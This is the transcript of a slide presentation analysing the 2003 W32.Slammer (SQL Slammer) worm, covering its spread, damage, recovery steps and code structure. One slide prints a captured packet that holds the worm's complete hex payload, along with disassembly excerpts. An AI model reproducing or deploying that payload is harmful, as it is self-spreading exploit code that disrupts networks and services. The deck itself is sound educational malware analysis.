Analysis of the W32.Slammer Worm - PowerPoint PPT Presentation

About This Presentation

Title:

Analysis of the W32.Slammer Worm

Description:

Analysis of the W32.Slammer Worm Mikhail Akhmeteli W32.Slammer Overview Aliases: SQL Slammer, Saphire, W32.SQLExp.Worm Released: January 25, 2003, at about 5:30 a ... – PowerPoint PPT presentation

Number of Views:81

Avg rating:3.0/5.0

Slides: 18

Provided by: MikhailA

Category:

more less

Transcript and Presenter's Notes

Title: Analysis of the W32.Slammer Worm

1
Analysis of the W32.Slammer Worm

Mikhail Akhmeteli

2
W32.Slammer Overview

Aliases SQL Slammer, Saphire,
W32.SQLExp.Worm
Released January 25, 2003, at about 530
a.m. (GMT)
Fastest worm in history
Spread world-wide in under 10 minutes
Doubled infections every 8.5 seconds
376 bytes long

3
Overview (continued)

Platform Microsoft SQL Server 2000
Vulnerability Buffer overflow
Patch available for 6 months
Propagation Single UDP packet
Features Memory resident, hand-coded in assembly

4
Direct Damage

Infected between 75,000 and 160,000 systems
Disabled SQL Server databases on infected
machines
Saturated world networks with traffic
Disrupted Internet connectivity world-wide

5
Effective Damage

South Korea was taken off-line
Disrupted financial institutions
Airline delays and cancellations
Affected many U.S. government and commercial
websites

6
Specific Damage

13,000 Bank of America ATMs stopped working
Continental Airlines flights were cancelled and
delayed ticketing system was inundated with
traffic. Airport self-check-in kiosks stopped
working
Activated Cisco router bugs at Internet backbones

7
Propagation Technique

Single UDP packet
Targets port 1434 (Microsoft-SQL-Monitor)
Causes buffer overflow
Continuously sends itself via UDP packets to
pseudo-random IP addresses, including broadcast
and multicast addresses
Does not check whether target machines exist

8
Recovery

Disconnect from network
Reboot the machine, or restart SQL Server
Block port 1434 at external firewall
Install patch

9
Propagation Speed

Infected 90 of vulnerable machines within 10
minutes
Doubled infections every 8.5 seconds
Achieved 55 million scans per second
Two orders of magnitude faster than Code Red

10
Propagation Speed
Source http//www.caida.org/analysis/security/sap
phire/
11
Infections 30 Minutes After Release
Source http//www.caida.org/analysis/security/sap
phire/
12
Propagation Analysis

Rapid spread made timely defense impossible
Rapid spread caused worm copies to compete
Bandwidth limited, not latency limited (doesnt
wait to establish connection)
Easy to stop at firewall

13
Possible Variations

Could have attacked HTTP or DNS servers
Could have gone dormant
Could have forged source port to DNS resolution

14
Worm Composition

376 bytes long
Less than 300 bytes of executable code
404 byte UDP packets, including headers
Composed of 4 functional sections

15
Worm Functions

Reconstructs session from buffer overflow
Obtains (and verifies!) Windows API function
addresses
Initializes pseudo-random number generator and
socket structures
Continuously generates random IP addresses and
sends UDP data-grams of itself

16
Packet Capture
01/27-154647.167917 206.204.21.1541087 -gt 24.59.36.1571434 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6 EB CA ................ ................ ................ ................ ................ ................ ....B.........p. B.p.B........h.. .B.....1...P..5. ...P..Qh.dllhel3 2hkernQhounthick ChGetTf.llQh32.d hws2_f.etQhsockf .toQhsend....B.E .P..P.E.P.E.P..P ....B....U..Qt. ....B....1.QQP.. ..........Q.E.P. E.P..j.j.j...P.E .P.E.P........lta ...E..._at_........ ...).......E.j.. E.P1.Qf..x.Q.E.P .E.P.... Selections from Disassembled code (by eEye Digital Security) push 42B0C9DCh RET sqlsort.dll -gt jmp esp . . Load strings . . . . call dword ptr esi GetProcAddress() call eax GetTickCount() . . . . call esi sendto()
Buffer Overflow
Reconstruct session
Get Windows API addresses
Initialize PRNG and socket
Send Packets
17
References

eEye Digital Security. http//www.eeye.com/html/Re
search/Flash/sapphire.txt
Cooperative Association for Internet Data
Analysis (CAIDA) http//www.caida.org/outreach/pap
ers/2003/sapphire/sapphire.html
Internet Storm Center. http//isc.incidents.org/an
alysis.html?id180
The Washington Post. http//www.washingtonpost.co
m/wp-dyn/articles/A46928-2003Jan26.html
CNET News.com. http//news.com.com/2100-1001-98
2135.html